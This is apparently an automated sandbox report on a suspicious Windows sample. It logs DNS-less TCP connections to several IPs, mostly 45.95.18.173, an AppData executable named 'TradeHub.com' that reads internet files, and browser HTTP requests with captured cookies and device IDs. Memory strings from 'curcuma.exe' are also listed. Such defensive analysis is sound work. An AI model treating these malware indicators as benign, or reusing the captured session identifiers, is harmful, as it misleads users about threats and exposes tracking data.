                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.227
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.227
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.227
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.227
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.227
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003DD889 InternetReadFile,SetEvent,GetLastError,SetEvent,27_2_003DD889
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CO6MywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CO6MywE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.55", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 400sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-full-version: "117.0.2045.55"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z; USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; MUIDB=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.55", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 400sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-full-version: "117.0.2045.55"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z; USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; MUIDB=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CO6MywE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b?rn=1741365293756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3B61B35AD2B06E2C0F4DA6F2D3A26FDA&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741365293756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=674e66c55a9344f481d3165612fd20c7&activityId=674e66c55a9344f481d3165612fd20c7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":32,"imageId":"BB1msKSh","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z; USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; MUIDB=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5e179a97-9338-40a1-9cc0-c38de61b5afc; ai_session=Ff3ogpzhHg3GNTwS9HR/cu|1741365293750|1741365293750; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z
                  Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.55", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 550sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-full-version: "117.0.2045.55"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z; USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; MUIDB=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5e179a97-9338-40a1-9cc0-c38de61b5afc; ai_session=Ff3ogpzhHg3GNTwS9HR/cu|1741365293750|1741365293750; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z
                  Source: global trafficHTTP traffic detected: GET /b2?rn=1741365293756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3B61B35AD2B06E2C0F4DA6F2D3A26FDA&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1BAe235586880830cfcd1a51741365297; XID=1BAe235586880830cfcd1a51741365297
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741365293756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=674e66c55a9344f481d3165612fd20c7&activityId=674e66c55a9344f481d3165612fd20c7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=9F3114AF064146BD91581B50BBBDD238&MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1; SM=T; msnup=%7B%22cnex%22%3A%22no%22%7D
                  Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                  Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                  Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comn\ t equals www.facebook.com (Facebook)
                  Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.com I equals www.youtube.com (Youtube)
                  Source: curcuma.exe, 00000024.00000003.2420129542.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: / tHyI5foKXl6Izt4OLqkzqV5mufPSMUKbhwKsIRGr5Bs=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/t&fg=1 equals www.youtube.com (Youtube)
                  Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @www.facebook.comn\ t equals www.facebook.com (Facebook)
                  Source: curcuma.exe, 00000024.00000003.2420129542.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: HyI5foKXl6Izt4OLqkzqV5mufPSMUKbhwKsIRGr5Bs=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
                  Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: `www.youtube.com equals www.youtube.com (Youtube)
